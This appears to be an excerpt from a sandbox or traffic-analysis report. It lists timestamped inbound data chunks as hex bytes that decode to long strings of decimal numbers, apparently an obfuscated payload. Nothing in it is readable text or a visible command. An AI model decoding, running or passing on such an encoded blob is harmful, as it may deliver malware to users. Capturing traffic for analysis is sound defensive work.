                    2021-10-26 16:59:17 UTC319INData Raw: 39 39 20 38 31 20 31 30 35 20 37 39 20 31 31 37 20 37 38 20 37 37 20 36 37 20 36 20 31 32 35 20 37 31 20 33 30 20 33 34 20 32 39 20 34 34 20 36 32 20 36 38 20 31 30 35 20 38 34 20 39 33 20 34 38 20 31 37 20 36 34 20 32 34 20 32 34 20 31 30 39 20 31 32 31 20 31 32 31 20 36 39 20 31 20 31 36 20 35 37 20 32 20 35 37 20 36 20 37 34 20 31 30 30 20 31 31 32 20 32 33 20 31 30 20 36 20 38 39 20 32 32 20 36 36 20 36 39 20 35 20 39 36 20 34 34 20 30 20 34 32 20 35 36 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 39 37 20 32 30 20 35 30 20 38 38 20 33 39 20 39 33 20 33 20 36 36 20 37 36 20 33 33 20 32 34 20 30 20 33 39 20 35 39 20 39 33 20 36 38 20 31 32 35 20 34 20 33 20 35 20 34 39 20 36 30 20 37 37 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 32 31 20 35 35
                    Data Ascii: 99 81 105 79 117 78 77 67 6 125 71 30 34 29 44 62 68 105 84 93 48 17 64 24 24 109 121 121 69 1 16 57 2 57 6 74 100 112 23 10 6 89 22 66 69 5 96 44 0 42 56 77 50 19 15 71 97 20 50 88 39 93 3 66 76 33 24 0 39 59 93 68 125 4 3 5 49 60 77 15 48 17 11 37 21 55
                    2021-10-26 16:59:17 UTC335INData Raw: 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 33 34 20 34 34 20 32 35 20 35 33 20 36 39 20 38 37 20 33 20 31 31 36 20 31 34 20 32 35 20 36 34 20 32 35 20 33 32 20 31 31 20 31 32 33 20 31 32 31 20 31 32 30 20 35 36 20 38 36 20 37 30 20 39 31 20 34 20 36 37 20 31 32 31 20 38 36 20 39 37 20 36 31 20 33 30 20 34 20 37 20 32 31 20 31 30 31 20 38 33 20 36 36 20 39 37 20 33 31 20 36 32 20 37 31 20 35 35 20 38 20 39 32 20 36 39 20 38 35 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 35 30 20 35 20 31 30 34 20 31 30 31 20 31 32 36 20 33 31 20 37 34 20 31 38 20 32 30 20 32 33 20 36 39 20 39 39 20 36 35 20 31 38 20 31 38 20 32 34 20 36 36 20 39 33 20 35 34 20 39 31 20 31 30 33 20 36 39 20 31 31 20 31 30 35 20 31 31 34 20 38 36 20 38 30 20 31 20 31 31 36 20 38 39
                    Data Ascii: 15 48 17 11 37 34 44 25 53 69 87 3 116 14 25 64 25 32 11 123 121 120 56 86 70 91 4 67 121 86 97 61 30 4 7 21 101 83 66 97 31 62 71 55 8 92 69 85 11 84 81 72 28 50 5 104 101 126 31 74 18 20 23 69 99 65 18 18 24 66 93 54 91 103 69 11 105 114 86 80 1 116 89
                    2021-10-26 16:59:17 UTC351INData Raw: 39 20 31 20 31 31 37 20 34 32 20 32 31 20 37 30 20 31 31 38 20 39 31 20 39 30 20 34 39 20 36 30 20 32 30 20 30 20 32 31 20 31 30 31 20 38 39 20 37 30 20 39 34 20 35 39 20 37 20 31 20 34 30 20 38 20 37 30 20 38 35 20 39 32 20 36 39 20 36 31 20 32 39 20 32 37 20 31 30 39 20 35 33 20 39 32 20 36 35 20 37 31 20 38 33 20 33 33 20 32 33 20 31 31 37 20 36 33 20 32 31 20 38 33 20 38 34 20 31 32 33 20 38 38 20 33 32 20 36 35 20 37 31 20 31 30 39 20 33 34 20 38 37 20 38 31 20 38 36 20 31 31 36 20 34 35 20 36 20 31 36 20 33 30 20 31 31 32 20 31 31 37 20 38 35 20 37 30 20 31 31 35 20 34 34 20 32 33 20 32 32 20 32 34 20 34 20 39 31 20 39 34 20 38 35 20 31 31 39 20 33 39 20 31 20 31 36 20 30 20 31 38 20 39 34 20 37 33 20 35 30 20 31 31 37 20 35 39 20 32 20 31 32 20 31
                    Data Ascii: 9 1 117 42 21 70 118 91 90 49 60 20 0 21 101 89 70 94 59 7 1 40 8 70 85 92 69 61 29 27 109 53 92 65 71 83 33 23 117 63 21 83 84 123 88 32 65 71 109 34 87 81 86 116 45 6 16 30 112 117 85 70 115 44 23 22 24 4 91 94 85 119 39 1 16 0 18 94 73 50 117 59 2 12 1
                    2021-10-26 16:59:17 UTC367INData Raw: 32 37 20 31 32 30 20 39 38 20 31 37 38 20 31 36 39 20 34 38 20 33 39 20 32 31 33 20 38 33 20 31 30 30 20 34 35 20 31 31 37 20 35 33 20 34 39 20 33 35 20 31 38 32 20 32 34 30 20 31 31 39 20 31 31 37 20 31 30 39 20 39 38 20 31 37 39 20 32 35 33 20 35 35 20 32 32 20 38 34 20 39 36 20 32 34 36 20 39 36 20 39 36 20 35 33 20 35 30 20 33 39 20 33 39 20 32 31 32 20 32 31 35 20 31 31 39 20 39 39 20 31 30 38 20 33 39 20 33 33 20 31 37 38 20 31 37 31 20 38 36 20 31 32 34 20 31 30 35 20 31 30 37 20 31 31 32 20 34 39 20 36 32 20 36 30 20 34 32 20 37 32 20 37 31 20 31 31 34 20 39 37 20 31 32 36 20 34 37 20 35 33 20 34 37 20 34 32 20 36 35 20 39 36 20 32 34 35 20 31 39 36 20 31 31 33 20 33 35 20 31 37 37 20 31 39 20 34 32 20 36 35 20 39 39 20 32 34 35 20 32 30 30 20 31
                    Data Ascii: 27 120 98 178 169 48 39 213 83 100 45 117 53 49 35 182 240 119 117 109 98 179 253 55 22 84 96 246 96 96 53 50 39 39 212 215 119 99 108 39 33 178 171 86 124 105 107 112 49 62 60 42 72 71 114 97 126 47 53 47 42 65 96 245 196 113 35 177 19 42 65 99 245 200 1
                    2021-10-26 16:59:17 UTC383INData Raw: 34 20 33 30 20 31 36 37 20 32 31 33 20 32 30 34 20 32 34 20 38 37 20 32 30 20 32 31 35 20 36 34 20 32 30 36 20 32 33 35 20 32 37 20 32 31 33 20 38 35 20 36 31 20 36 20 32 30 33 20 31 34 35 20 37 20 32 30 33 20 35 31 20 31 36 36 20 32 32 35 20 35 20 38 20 32 32 30 20 39 32 20 33 20 31 35 34 20 31 33 33 20 38 39 20 31 35 33 20 31 36 39 20 31 37 36 20 36 31 20 34 37 20 33 33 20 32 36 20 31 30 38 20 31 33 33 20 37 39 20 36 31 20 31 36 30 20 39 36 20 33 36 20 31 30 39 20 37 31 20 32 35 20 31 33 33 20 33 30 20 31 35 36 20 31 38 37 20 35 31 20 31 31 20 31 36 30 20 33 32 20 39 32 20 32 33 20 36 39 20 31 30 34 20 32 34 30 20 36 38 20 34 35 20 38 20 32 30 20 33 32 20 35 37 20 39 33 20 31 32 39 20 39 33 20 37 30 20 37 30 20 31 30 34 20 32 31 20 37 32 20 32 39 20 36
                    Data Ascii: 4 30 167 213 204 24 87 20 215 64 206 235 27 213 85 61 6 203 145 7 203 51 166 225 5 8 220 92 3 154 133 89 153 169 176 61 47 33 26 108 133 79 61 160 96 36 109 71 25 133 30 156 187 51 11 160 32 92 23 69 104 240 68 45 8 20 32 57 93 129 93 70 70 104 21 72 29 6
                    2021-10-26 16:59:17 UTC399INData Raw: 30 39 20 38 38 20 31 37 34 20 39 32 20 34 31 20 31 34 33 20 31 39 32 20 31 38 30 20 32 30 37 20 35 20 35 31 20 36 33 20 31 30 31 20 32 33 30 20 32 31 34 20 32 35 30 20 31 37 39 20 31 31 33 20 33 32 20 32 34 31 20 31 34 30 20 32 30 37 20 31 34 32 20 31 34 30 20 32 30 33 20 31 35 31 20 32 32 38 20 30 20 32 33 20 36 36 20 31 20 32 35 32 20 31 37 38 20 37 38 20 39 31 20 32 31 32 20 33 35 20 31 33 36 20 31 37 37 20 31 31 30 20 32 31 37 20 31 33 20 31 37 36 20 35 35 20 35 20 32 30 38 20 33 39 20 38 35 20 37 30 20 37 36 20 37 37 20 34 35 20 39 32 20 31 37 30 20 31 39 30 20 32 32 20 33 32 20 33 34 20 31 39 39 20 34 37 20 31 35 20 31 35 20 32 33 33 20 31 33 38 20 32 33 36 20 32 34 31 20 31 39 30 20 31 39 20 38 31 20 36 31 20 34 37 20 31 37 35 20 36 20 32 30 35 20
                    Data Ascii: 09 88 174 92 41 143 192 180 207 5 51 63 101 230 214 250 179 113 32 241 140 207 142 140 203 151 228 0 23 66 1 252 178 78 91 212 35 136 177 110 217 13 176 55 5 208 39 85 70 76 77 45 92 170 190 22 32 34 199 47 15 15 233 138 236 241 190 19 81 61 47 175 6 205
                    2021-10-26 16:59:17 UTC415INData Raw: 20 31 31 32 20 31 38 30 20 31 34 30 20 39 20 38 32 20 34 34 20 39 30 20 31 32 36 20 37 20 37 34 20 32 33 31 20 37 37 20 31 36 32 20 32 32 39 20 31 36 35 20 32 35 31 20 31 31 33 20 32 34 34 20 32 39 20 31 30 20 39 31 20 39 31 20 37 20 31 35 38 20 31 33 33 20 32 31 38 20 32 31 32 20 31 36 34 20 31 38 32 20 32 32 37 20 31 37 34 20 33 36 20 31 36 37 20 31 34 36 20 34 35 20 31 39 38 20 31 38 36 20 33 33 20 31 35 33 20 31 38 36 20 32 31 33 20 37 33 20 31 39 36 20 37 30 20 33 20 32 34 35 20 31 34 39 20 32 20 31 39 34 20 31 31 38 20 31 31 35 20 31 37 37 20 32 34 20 35 30 20 35 30 20 35 20 31 31 33 20 34 31 20 31 36 32 20 31 35 20 31 37 31 20 32 30 35 20 31 31 33 20 36 38 20 36 20 31 31 38 20 31 36 39 20 31 31 31 20 34 32 20 31 38 31 20 34 36 20 32 33 35 20 31 34
                    Data Ascii: 112 180 140 9 82 44 90 126 7 74 231 77 162 229 165 251 113 244 29 10 91 91 7 158 133 218 212 164 182 227 174 36 167 146 45 198 186 33 153 186 213 73 196 70 3 245 149 2 194 118 115 177 24 50 50 5 113 41 162 15 171 205 113 68 6 118 169 111 42 181 46 235 14
                    2021-10-26 16:59:17 UTC431INData Raw: 31 34 33 20 31 37 39 20 31 31 20 32 32 34 20 37 35 20 31 36 34 20 31 34 35 20 32 34 32 20 32 20 32 36 20 32 31 38 20 38 37 20 31 38 32 20 32 30 32 20 31 34 32 20 32 34 35 20 35 20 31 32 37 20 39 32 20 34 32 20 32 33 33 20 31 38 33 20 31 38 36 20 32 31 35 20 31 38 32 20 32 31 32 20 31 31 32 20 38 37 20 37 38 20 31 38 30 20 31 39 39 20 39 35 20 39 30 20 39 20 31 32 31 20 32 30 36 20 32 34 37 20 32 31 36 20 31 36 36 20 31 30 30 20 31 31 37 20 31 38 36 20 32 38 20 31 31 38 20 33 37 20 31 33 20 32 34 20 32 33 39 20 31 36 35 20 39 36 20 38 37 20 32 32 33 20 32 31 39 20 31 34 33 20 32 32 37 20 31 30 32 20 31 34 34 20 31 36 37 20 33 30 20 31 37 33 20 31 39 39 20 38 20 32 32 20 31 35 30 20 31 34 37 20 31 39 37 20 32 37 20 35 31 20 31 32 34 20 32 33 31 20 31 32 31
                    Data Ascii: 143 179 11 224 75 164 145 242 2 26 218 87 182 202 142 245 5 127 92 42 233 183 186 215 182 212 112 87 78 180 199 95 90 9 121 206 247 216 166 100 117 186 28 118 37 13 24 239 165 96 87 223 219 143 227 102 144 167 30 173 199 8 22 150 147 197 27 51 124 231 121
                    2021-10-26 16:59:17 UTC447INData Raw: 30 20 31 20 31 30 38 20 31 32 31 20 31 31 35 20 31 34 36 20 31 36 37 20 34 32 20 31 36 37 20 33 32 20 31 38 20 31 36 20 35 37 20 32 31 20 32 35 30 20 32 34 34 20 39 35 20 34 38 20 31 38 20 30 20 31 33 31 20 31 37 31 20 32 35 34 20 32 31 37 20 32 32 30 20 31 32 35 20 37 39 20 32 35 31 20 32 33 33 20 33 36 20 31 34 34 20 32 30 32 20 31 38 31 20 32 35 30 20 32 34 34 20 32 31 32 20 32 32 35 20 31 37 37 20 32 34 37 20 34 33 20 32 34 20 38 34 20 31 35 33 20 31 32 32 20 39 38 20 32 31 37 20 31 32 34 20 31 30 33 20 37 30 20 32 39 20 31 39 36 20 31 38 20 34 39 20 32 32 36 20 39 38 20 31 39 35 20 31 38 39 20 31 30 39 20 31 37 36 20 31 31 34 20 32 35 32 20 31 30 20 31 35 31 20 33 35 20 33 39 20 33 31 20 37 34 20 31 37 34 20 31 39 38 20 31 33 35 20 31 34 30 20 31 35
                    Data Ascii: 0 1 108 121 115 146 167 42 167 32 18 16 57 21 250 244 95 48 18 0 131 171 254 217 220 125 79 251 233 36 144 202 181 250 244 212 225 177 247 43 24 84 153 122 98 217 124 103 70 29 196 18 49 226 98 195 189 109 176 114 252 10 151 35 39 31 74 174 198 135 140 15
                    2021-10-26 16:59:17 UTC463INData Raw: 32 20 32 30 34 20 36 39 20 32 30 34 20 32 33 31 20 32 30 31 20 37 20 37 35 20 31 36 35 20 31 31 34 20 31 36 39 20 34 37 20 31 36 32 20 31 38 32 20 35 38 20 32 20 31 38 39 20 31 35 38 20 32 35 20 39 38 20 31 38 32 20 31 36 31 20 32 30 33 20 31 35 36 20 31 33 30 20 31 32 35 20 31 37 38 20 32 32 37 20 31 36 36 20 32 32 36 20 34 30 20 32 34 35 20 31 39 39 20 31 38 36 20 31 36 31 20 32 32 20 32 37 20 32 33 32 20 31 34 33 20 32 31 30 20 34 32 20 36 31 20 31 30 30 20 32 30 38 20 31 35 33 20 32 32 30 20 32 33 37 20 36 35 20 39 30 20 31 35 30 20 31 34 32 20 31 30 39 20 31 33 35 20 32 33 32 20 31 31 32 20 38 36 20 31 31 37 20 31 37 32 20 31 33 33 20 32 35 33 20 32 31 31 20 32 32 33 20 39 38 20 32 34 37 20 38 34 20 35 32 20 33 34 20 31 33 34 20 31 38 33 20 31 36 35
                    Data Ascii: 2 204 69 204 231 201 7 75 165 114 169 47 162 182 58 2 189 158 25 98 182 161 203 156 130 125 178 227 166 226 40 245 199 186 161 22 27 232 143 210 42 61 100 208 153 220 237 65 90 150 142 109 135 232 112 86 117 172 133 253 211 223 98 247 84 52 34 134 183 165
                    2021-10-26 16:59:17 UTC479INData Raw: 34 20 36 20 32 35 33 20 31 31 35 20 35 36 20 39 35 20 31 36 31 20 32 35 35 20 31 38 34 20 31 30 30 20 31 32 33 20 37 39 20 31 35 37 20 32 31 35 20 31 34 35 20 32 31 31 20 32 30 31 20 38 34 20 32 35 35 20 31 34 37 20 32 31 39 20 38 20 38 32 20 31 38 35 20 33 38 20 39 30 20 32 31 20 39 37 20 31 38 32 20 31 35 32 20 38 32 20 31 32 20 32 31 30 20 32 32 20 32 34 34 20 32 35 34 20 38 35 20 32 34 34 20 32 39 20 37 36 20 31 35 32 20 32 33 39 20 32 32 39 20 39 33 20 31 36 20 33 39 20 31 38 31 20 31 35 34 20 31 36 36 20 31 36 31 20 32 32 36 20 34 33 20 38 35 20 32 33 39 20 32 32 30 20 31 32 20 39 31 20 31 31 32 20 31 33 39 20 31 39 38 20 31 30 39 20 31 32 36 20 32 34 37 20 38 34 20 35 35 20 32 33 20 32 34 30 20 32 30 32 20 31 35 38 20 31 31 38 20 38 30 20 31 36 36
                    Data Ascii: 4 6 253 115 56 95 161 255 184 100 123 79 157 215 145 211 201 84 255 147 219 8 82 185 38 90 21 97 182 152 82 12 210 22 244 254 85 244 29 76 152 239 229 93 16 39 181 154 166 161 226 43 85 239 220 12 91 112 139 198 109 126 247 84 55 23 240 202 158 118 80 166
                    2021-10-26 16:59:17 UTC495INData Raw: 31 37 34 20 31 33 35 20 38 37 20 33 32 20 32 30 38 20 32 32 20 31 38 32 20 32 34 38 20 35 34 20 33 37 20 32 30 34 20 31 31 34 20 31 36 30 20 34 38 20 31 32 33 20 31 33 38 20 36 38 20 31 39 36 20 38 35 20 32 30 33 20 31 37 33 20 32 35 31 20 37 32 20 31 32 20 33 35 20 38 32 20 33 35 20 31 33 30 20 31 34 31 20 31 32 30 20 31 38 35 20 30 20 32 38 20 31 31 34 20 34 37 20 32 33 31 20 32 33 20 31 35 37 20 31 37 35 20 31 30 34 20 31 35 20 33 20 36 20 31 36 34 20 31 32 30 20 32 30 35 20 32 30 20 31 39 38 20 31 31 30 20 31 39 34 20 32 33 30 20 31 36 36 20 32 33 37 20 31 30 32 20 34 34 20 32 32 32 20 33 34 20 31 38 39 20 31 35 20 32 31 30 20 32 34 36 20 31 34 30 20 31 38 38 20 32 34 34 20 34 33 20 32 31 33 20 34 30 20 31 20 31 31 33 20 38 30 20 36 38 20 33 38 20 32
                    Data Ascii: 174 135 87 32 208 22 182 248 54 37 204 114 160 48 123 138 68 196 85 203 173 251 72 12 35 82 35 130 141 120 185 0 28 114 47 231 23 157 175 104 15 3 6 164 120 205 20 198 110 194 230 166 237 102 44 222 34 189 15 210 246 140 188 244 43 213 40 1 113 80 68 38 2
                    2021-10-26 16:59:17 UTC511INData Raw: 32 30 37 20 32 35 30 20 32 33 32 20 32 33 35 20 32 34 32 20 31 36 36 20 35 32 20 32 32 38 20 32 34 38 20 32 34 20 32 31 32 20 32 34 33 20 32 31 32 20 31 32 39 20 34 33 20 32 30 37 20 31 38 30 20 33 37 20 35 32 20 32 30 32 20 38 35 20 34 38 20 35 30 20 34 36 20 34 34 20 32 35 32 20 39 20 31 32 31 20 31 38 32 20 31 36 36 20 31 20 32 20 31 33 34 20 32 32 37 20 32 33 36 20 33 32 20 31 32 34 20 39 37 20 32 33 33 20 32 34 33 20 31 33 20 31 35 30 20 36 34 20 38 39 20 31 31 38 20 36 30 20 31 35 35 20 39 36 20 38 33 20 31 36 30 20 31 34 34 20 38 36 20 32 33 35 20 31 32 30 20 31 32 20 35 20 39 30 20 32 35 34 20 32 32 36 20 31 31 20 32 33 38 20 33 32 20 32 35 32 20 31 35 35 20 31 35 33 20 31 33 39 20 39 31 20 31 32 33 20 32 32 37 20 31 35 37 20 31 20 31 32 35 20 31
                    Data Ascii: 207 250 232 235 242 166 52 228 248 24 212 243 212 129 43 207 180 37 52 202 85 48 50 46 44 252 9 121 182 166 1 2 134 227 236 32 124 97 233 243 13 150 64 89 118 60 155 96 83 160 144 86 235 120 12 5 90 254 226 11 238 32 252 155 153 139 91 123 227 157 1 125 1
                    2021-10-26 16:59:17 UTC527INData Raw: 31 38 39 20 31 34 20 31 30 34 20 39 32 20 38 37 20 31 37 35 20 36 38 20 31 36 20 36 20 32 32 38 20 31 32 31 20 30 20 31 30 38 20 32 31 35 20 32 33 38 20 32 32 36 20 31 33 35 20 31 36 34 20 32 35 31 20 32 32 31 20 31 33 32 20 31 35 38 20 34 34 20 31 31 36 20 31 33 20 32 33 35 20 32 35 34 20 39 30 20 33 32 20 32 35 35 20 32 20 37 38 20 37 34 20 36 36 20 33 20 31 32 39 20 33 36 20 39 39 20 31 30 35 20 38 32 20 32 30 20 32 33 31 20 31 35 39 20 31 37 32 20 31 37 36 20 32 32 34 20 31 33 20 32 32 39 20 31 37 31 20 31 35 36 20 32 35 32 20 37 37 20 31 37 38 20 31 32 39 20 34 36 20 31 30 30 20 31 30 30 20 32 34 31 20 33 38 20 36 36 20 38 38 20 31 30 36 20 31 35 32 20 31 36 34 20 32 33 30 20 37 30 20 32 31 30 20 31 30 36 20 31 34 30 20 31 32 35 20 33 31 20 31 38 33
                    Data Ascii: 189 14 104 92 87 175 68 16 6 228 121 0 108 215 238 226 135 164 251 221 132 158 44 116 13 235 254 90 32 255 2 78 74 66 3 129 36 99 105 82 20 231 159 172 176 224 13 229 171 156 252 77 178 129 46 100 100 241 38 66 88 106 152 164 230 70 210 106 140 125 31 183
                    2021-10-26 16:59:17 UTC543INData Raw: 31 20 33 32 20 31 35 37 20 32 35 33 20 32 39 20 39 39 20 31 31 33 20 32 35 33 20 38 35 20 31 30 34 20 31 30 36 20 34 30 20 31 37 37 20 31 36 20 31 39 38 20 33 20 34 39 20 32 33 37 20 31 30 31 20 31 38 32 20 34 36 20 32 31 30 20 36 34 20 39 39 20 38 35 20 38 37 20 31 30 34 20 31 35 34 20 34 31 20 32 32 36 20 37 35 20 31 30 31 20 31 33 37 20 32 30 20 32 34 37 20 33 36 20 34 37 20 34 31 20 32 35 34 20 38 38 20 31 32 31 20 32 34 34 20 31 31 34 20 31 32 34 20 31 35 36 20 37 34 20 32 31 37 20 31 39 32 20 37 30 20 32 35 32 20 31 31 36 20 31 34 39 20 31 37 36 20 31 30 33 20 31 30 37 20 39 30 20 32 32 35 20 31 39 31 20 35 30 20 35 39 20 36 33 20 39 31 20 31 34 34 20 31 31 30 20 32 33 33 20 36 37 20 31 32 31 20 32 30 38 20 32 31 33 20 31 39 36 20 31 37 38 20 32 30
                    Data Ascii: 1 32 157 253 29 99 113 253 85 104 106 40 177 16 198 3 49 237 101 182 46 210 64 99 85 87 104 154 41 226 75 101 137 20 247 36 47 41 254 88 121 244 114 124 156 74 217 192 70 252 116 149 176 103 107 90 225 191 50 59 63 91 144 110 233 67 121 208 213 196 178 20
                    2021-10-26 16:59:17 UTC559INData Raw: 31 38 20 33 36 20 32 32 35 20 31 31 34 20 32 39 20 31 33 34 20 31 33 30 20 31 35 30 20 32 34 37 20 38 31 20 32 35 20 32 34 30 20 37 37 20 31 39 20 31 39 37 20 32 31 39 20 34 34 20 31 33 39 20 32 32 32 20 35 32 20 33 33 20 32 34 32 20 32 31 20 31 37 37 20 30 20 31 33 30 20 34 30 20 33 33 20 35 37 20 33 36 20 31 39 38 20 31 36 31 20 31 39 33 20 31 37 31 20 36 39 20 31 34 35 20 31 30 33 20 32 34 33 20 32 31 30 20 31 31 33 20 31 34 32 20 37 33 20 38 20 34 33 20 35 31 20 32 34 37 20 33 20 32 31 36 20 34 36 20 31 31 39 20 31 34 34 20 34 20 32 32 35 20 31 37 33 20 32 32 35 20 31 39 36 20 35 36 20 31 36 30 20 32 32 30 20 33 35 20 37 31 20 39 38 20 34 35 20 31 38 36 20 31 32 20 31 37 37 20 32 34 30 20 38 31 20 39 33 20 31 39 31 20 35 35 20 32 32 30 20 31 37 37 20
                    Data Ascii: 18 36 225 114 29 134 130 150 247 81 25 240 77 19 197 219 44 139 222 52 33 242 21 177 0 130 40 33 57 36 198 161 193 171 69 145 103 243 210 113 142 73 8 43 51 247 3 216 46 119 144 4 225 173 225 196 56 160 220 35 71 98 45 186 12 177 240 81 93 191 55 220 177
                    2021-10-26 16:59:17 UTC575INData Raw: 34 20 32 33 30 20 32 35 30 20 31 37 32 20 31 34 37 20 31 33 20 36 32 20 31 38 32 20 31 30 32 20 33 39 20 37 35 20 33 38 20 34 34 20 32 34 38 20 32 30 38 20 31 31 39 20 32 31 30 20 32 32 36 20 38 38 20 31 34 38 20 31 32 37 20 31 35 31 20 31 39 33 20 35 37 20 31 35 30 20 38 30 20 31 36 31 20 31 37 36 20 37 39 20 31 37 38 20 31 31 32 20 37 36 20 31 33 35 20 37 35 20 34 37 20 31 38 35 20 31 30 38 20 31 34 33 20 31 31 33 20 31 36 39 20 31 30 35 20 37 35 20 32 30 36 20 32 30 36 20 31 38 34 20 32 30 38 20 32 34 38 20 30 20 38 38 20 32 31 33 20 36 30 20 36 37 20 38 34 20 31 37 35 20 32 34 38 20 32 38 20 34 36 20 31 35 36 20 31 39 30 20 34 37 20 31 38 33 20 32 34 33 20 31 39 35 20 32 35 33 20 38 30 20 34 35 20 31 38 38 20 37 34 20 31 31 35 20 39 20 37 35 20 33 31
                    Data Ascii: 4 230 250 172 147 13 62 182 102 39 75 38 44 248 208 119 210 226 88 148 127 151 193 57 150 80 161 176 79 178 112 76 135 75 47 185 108 143 113 169 105 75 206 206 184 208 248 0 88 213 60 67 84 175 248 28 46 156 190 47 183 243 195 253 80 45 188 74 115 9 75 31
                    2021-10-26 16:59:17 UTC591INData Raw: 36 20 31 34 39 20 31 39 33 20 32 33 30 20 35 20 31 32 37 20 31 34 37 20 34 20 37 30 20 33 38 20 31 31 36 20 31 32 39 20 32 35 33 20 34 32 20 36 39 20 36 37 20 32 20 32 35 30 20 31 33 38 20 31 33 36 20 33 30 20 31 31 34 20 31 35 38 20 33 31 20 31 37 35 20 38 35 20 34 33 20 37 37 20 32 30 38 20 31 33 37 20 31 33 36 20 32 33 30 20 33 31 20 31 34 38 20 35 32 20 32 34 33 20 32 33 35 20 31 36 33 20 36 38 20 31 34 36 20 32 30 35 20 36 36 20 31 32 38 20 31 31 20 31 39 39 20 32 32 33 20 31 32 31 20 31 38 32 20 31 34 39 20 35 39 20 32 30 39 20 32 31 38 20 32 33 32 20 31 34 36 20 39 38 20 31 34 36 20 31 30 30 20 36 34 20 31 30 38 20 31 36 34 20 31 35 20 31 31 37 20 37 31 20 31 31 38 20 39 30 20 31 36 32 20 32 33 20 31 39 31 20 31 34 34 20 31 37 32 20 31 36 20 33 37
                    Data Ascii: 6 149 193 230 5 127 147 4 70 38 116 129 253 42 69 67 2 250 138 136 30 114 158 31 175 85 43 77 208 137 136 230 31 148 52 243 235 163 68 146 205 66 128 11 199 223 121 182 149 59 209 218 232 146 98 146 100 64 108 164 15 117 71 118 90 162 23 191 144 172 16 37
                    2021-10-26 16:59:17 UTC607INData Raw: 20 31 32 39 20 31 39 39 20 31 39 39 20 37 38 20 32 34 39 20 31 38 33 20 31 32 38 20 31 37 30 20 33 35 20 35 20 32 31 20 39 36 20 31 30 36 20 33 38 20 31 36 34 20 31 38 31 20 37 34 20 31 30 36 20 32 32 35 20 38 39 20 31 32 35 20 39 32 20 37 39 20 31 34 36 20 32 30 34 20 31 37 32 20 32 32 32 20 32 34 37 20 32 33 34 20 31 32 38 20 31 36 34 20 34 37 20 31 39 31 20 34 35 20 32 35 34 20 36 37 20 31 32 36 20 32 34 32 20 31 38 31 20 32 31 35 20 34 32 20 32 31 30 20 31 33 36 20 31 39 36 20 32 32 32 20 32 32 37 20 30 20 31 37 39 20 33 35 20 31 30 32 20 31 36 37 20 31 30 20 31 31 36 20 35 33 20 32 34 37 20 32 32 31 20 31 33 35 20 31 32 37 20 35 39 20 39 20 31 34 37 20 31 34 31 20 32 20 38 36 20 37 20 31 35 30 20 31 34 33 20 31 32 36 20 38 31 20 31 31 38 20 32 32 34
                    Data Ascii: 129 199 199 78 249 183 128 170 35 5 21 96 106 38 164 181 74 106 225 89 125 92 79 146 204 172 222 247 234 128 164 47 191 45 254 67 126 242 181 215 42 210 136 196 222 227 0 179 35 102 167 10 116 53 247 221 135 127 59 9 147 141 2 86 7 150 143 126 81 118 224
                    2021-10-26 16:59:17 UTC623INData Raw: 31 38 39 20 35 33 20 31 36 30 20 39 32 20 31 32 37 20 37 20 38 31 20 31 32 35 20 32 32 20 31 31 34 20 31 31 34 20 32 30 39 20 32 35 31 20 35 37 20 31 39 35 20 31 37 30 20 31 33 31 20 36 32 20 31 39 20 32 34 38 20 31 38 33 20 39 35 20 31 37 34 20 32 35 35 20 31 36 35 20 32 30 34 20 31 30 33 20 32 31 34 20 32 31 37 20 31 32 35 20 35 36 20 33 38 20 33 35 20 31 31 34 20 37 39 20 31 31 33 20 31 32 34 20 31 36 30 20 36 37 20 31 35 20 31 34 30 20 32 30 31 20 34 30 20 32 32 20 31 37 38 20 34 34 20 32 34 32 20 32 31 37 20 39 31 20 31 30 32 20 31 34 38 20 34 30 20 31 33 38 20 31 36 37 20 31 39 35 20 35 33 20 31 35 33 20 31 39 20 36 31 20 39 20 32 31 34 20 31 38 38 20 31 33 36 20 31 32 39 20 31 36 31 20 34 31 20 39 34 20 32 33 20 31 38 34 20 32 33 32 20 31 34 34 20
                    Data Ascii: 189 53 160 92 127 7 81 125 22 114 114 209 251 57 195 170 131 62 19 248 183 95 174 255 165 204 103 214 217 125 56 38 35 114 79 113 124 160 67 15 140 201 40 22 178 44 242 217 91 102 148 40 138 167 195 53 153 19 61 9 214 188 136 129 161 41 94 23 184 232 144
                    2021-10-26 16:59:17 UTC639INData Raw: 20 32 33 39 20 36 20 32 33 32 20 36 20 31 31 34 20 31 38 20 32 34 37 20 31 33 32 20 32 33 39 20 32 32 39 20 31 31 38 20 37 34 20 32 35 30 20 31 33 33 20 32 39 20 31 31 35 20 32 39 20 31 38 35 20 39 39 20 32 34 37 20 38 35 20 30 20 33 35 20 32 32 39 20 34 37 20 36 31 20 32 31 35 20 32 34 38 20 31 35 31 20 39 38 20 31 36 32 20 31 37 38 20 32 32 33 20 31 38 32 20 31 39 38 20 36 35 20 31 31 37 20 32 33 31 20 31 36 30 20 33 39 20 32 35 34 20 31 36 38 20 37 20 37 32 20 31 35 39 20 39 20 33 30 20 35 30 20 32 35 33 20 31 33 37 20 31 38 34 20 32 34 32 20 32 32 31 20 31 37 34 20 31 35 34 20 37 38 20 31 32 33 20 37 37 20 31 38 32 20 32 30 32 20 31 38 36 20 31 34 39 20 36 34 20 35 37 20 36 34 20 37 20 31 20 31 38 37 20 37 33 20 32 35 33 20 31 30 36 20 32 20 32 35 35
                    Data Ascii: 239 6 232 6 114 18 247 132 239 229 118 74 250 133 29 115 29 185 99 247 85 0 35 229 47 61 215 248 151 98 162 178 223 182 198 65 117 231 160 39 254 168 7 72 159 9 30 50 253 137 184 242 221 174 154 78 123 77 182 202 186 149 64 57 64 7 1 187 73 253 106 2 255
